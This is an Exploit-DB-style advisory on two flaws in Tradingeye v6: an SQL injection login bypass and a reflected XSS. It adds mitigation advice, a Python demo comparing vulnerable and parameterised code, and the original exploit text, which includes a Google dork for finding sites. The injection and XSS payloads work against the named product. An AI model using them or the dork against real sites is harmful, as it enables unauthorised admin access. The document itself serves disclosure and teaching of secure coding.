Vendor: Tradingeye
By: Raghavendra Karthik D
CVSS: 8.8 (HIGH)
CWE: CWE-89, CWE-79
Title: Authentication Bypass and Reflected XSS
Product Name: Tradingeye
Affected Version From: v6
Affected Version To: v6
Patch Exists: YES
Related CWE: N/A
CPE: tradingeye
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Date: 2011

Tradingeye Multiple Vulnerabilities

The admin login form (adminindex.php) builds its query from unsanitised input, so an SQL injection payload such as ' or 0=0 # in the username and password fields bypasses authentication and lands the attacker in the admin panel. The admin panel's search field reflects user input into the page without encoding, giving a reflected XSS. Exploit payload: ">><marquee><h1>XSSed_by_r007k17</h1></marquee>

Mitigation:

Use prepared statements (parameterised queries) for the login lookup so that quotes and comment characters in user input cannot change the query structure; output-encode anything reflected into the admin search page for its HTML context; and enforce authentication and authorization server-side on every admin action rather than trusting the login form alone.
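To make the two defects concrete, the following is an added example (not Tradingeye code, and the table, column names, user row and function names are assumptions): a string-concatenated login query beside its parameterised form, and the search field reflected raw beside the same field with attribute-context encoding, driven by the exact payloads from the advisory. The advisory's payload uses MySQL's # comment; the in-memory SQLite database used here comments with -- instead, so the runnable bypass maps the payload onto that form while the query-builder shows the MySQL string verbatim.

```python
"""Auth-bypass and reflected-XSS demo modelled on the Tradingeye v6 advisory.

Added example, not code from Tradingeye. The admin_users table, its single
row and all function names are assumptions made for this demo; the two
payloads are the ones quoted in the advisory.
"""
import html
import sqlite3

# Payloads from the advisory (constructed inputs for this demo).
SQLI_PAYLOAD = "' or 0=0 #"
XSS_PAYLOAD = '">><marquee><h1>XSSed_by_r007k17</h1></marquee>'


def build_vulnerable_query(username: str, password: str) -> str:
    """String-concatenated login query: shows exactly what the database sees.

    With the advisory payload in both fields the WHERE clause becomes
        username='' or 0=0 #' AND password='' or 0=0 #'
    MySQL treats '#' as the start of a comment, so the password check is
    discarded and the always-true 'or 0=0' matches the first user row.
    """
    return (
        "SELECT id, username FROM admin_users "
        f"WHERE username='{username}' AND password='{password}'"
    )


def _demo_db() -> sqlite3.Connection:
    """In-memory table with one constructed admin row (assumed schema).

    Plain-text passwords are kept only to mirror the concatenated query;
    a real application stores a salted hash and compares after lookup.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE admin_users (id INTEGER, username TEXT, password TEXT)"
    )
    conn.execute("INSERT INTO admin_users VALUES (1, 'admin', 'correct-horse')")
    return conn


def vulnerable_login(username: str, password: str):
    """Runs the concatenated query against SQLite.

    SQLite comments with '--' rather than MySQL's '#', so pass
    "' or 0=0 --" here to reproduce the advisory's bypass; the '#' form
    would be a syntax error on SQLite but works on MySQL.
    """
    conn = _demo_db()
    try:
        return conn.execute(build_vulnerable_query(username, password)).fetchone()
    finally:
        conn.close()


def safe_login(username: str, password: str):
    """Parameterised query: the input is bound as a value, never parsed as SQL,
    so no quote or comment character can alter the query structure."""
    conn = _demo_db()
    try:
        return conn.execute(
            "SELECT id, username FROM admin_users WHERE username=? AND password=?",
            (username, password),
        ).fetchone()
    finally:
        conn.close()


def render_search_vulnerable(term: str) -> str:
    """Echoes the search term straight into an attribute value, as the
    advisory's admin search field appears to do. The payload's leading
    '">' closes the attribute and the tag, and the markup that follows runs."""
    return f'<input type="text" name="search" value="{term}">'


def render_search_safe(term: str) -> str:
    """Encodes for the HTML attribute context (quote=True turns '"' into
    &quot;), so the term is displayed as text and cannot break out."""
    return f'<input type="text" name="search" value="{html.escape(term, quote=True)}">'


if __name__ == "__main__":
    print(build_vulnerable_query(SQLI_PAYLOAD, SQLI_PAYLOAD))
    print("vulnerable login:", vulnerable_login("' or 0=0 --", "' or 0=0 --"))
    print("safe login:      ", safe_login("' or 0=0 --", "' or 0=0 --"))
    print(render_search_vulnerable(XSS_PAYLOAD))
    print(render_search_safe(XSS_PAYLOAD))
```

The fix on the SQL side is structural, not a blacklist: binding the value means a quote in the username is just a quote. On the XSS side the encoding must match the output context; html.escape with quote=True covers a double-quoted attribute, but a value echoed into JavaScript or a URL would need that context's encoding instead.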

Exploit-DB raw data:

# Exploit Title: Tradingeye Multiple Vulnerabilities
# Vendor:  www.tradingeye.com
# Date: 12th july,2011
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D (http://www.shadowrootkit.wordpress.com)
# Google Dork:  Powered by Tradingeye. 2009 Tradingeye v6 demo
*****************************************************************************************************************************************************************************************
BRIEF DESCRIPTION
*****************************
Tradingeye is a fully-featured web standards compliant Shopping Cart & CMS,
built from the ground up with web accessibility and SEO in mind. Tradingeye
is the choice of thousands of online retailers who care about accessibility,
usability and most importantly - results.

******************************************************************************************************************************************************************************************

(Auth ByPass) SQLi Vulnerability
***************************************
{DEMO} : http://site.com/adminindex.php

EXPLOIT:
                 Username: ' or 0=0 #
                 Password: ' or 0=0 #
Observe: Attackers can use the authentication bypass to get into the admin
panel of the site.

Reflected XSS Vulnerability
********************************
EXPLOIT 2: Reflected XSS Vulnerability in the admin panel (search field)

   {Demo}: http://site.com/user/adminindex.php?action=user.home
    Exploit:  ">><marquee><h1>XSSed_by_r007k17</h1></marquee>

*****************************************************************************************************************************************************************************************
gr33t1ngs to s1d3 effects and my friends@!21/\/ _3lda@!3.14--
*****************************************************************************************************************************************************************************************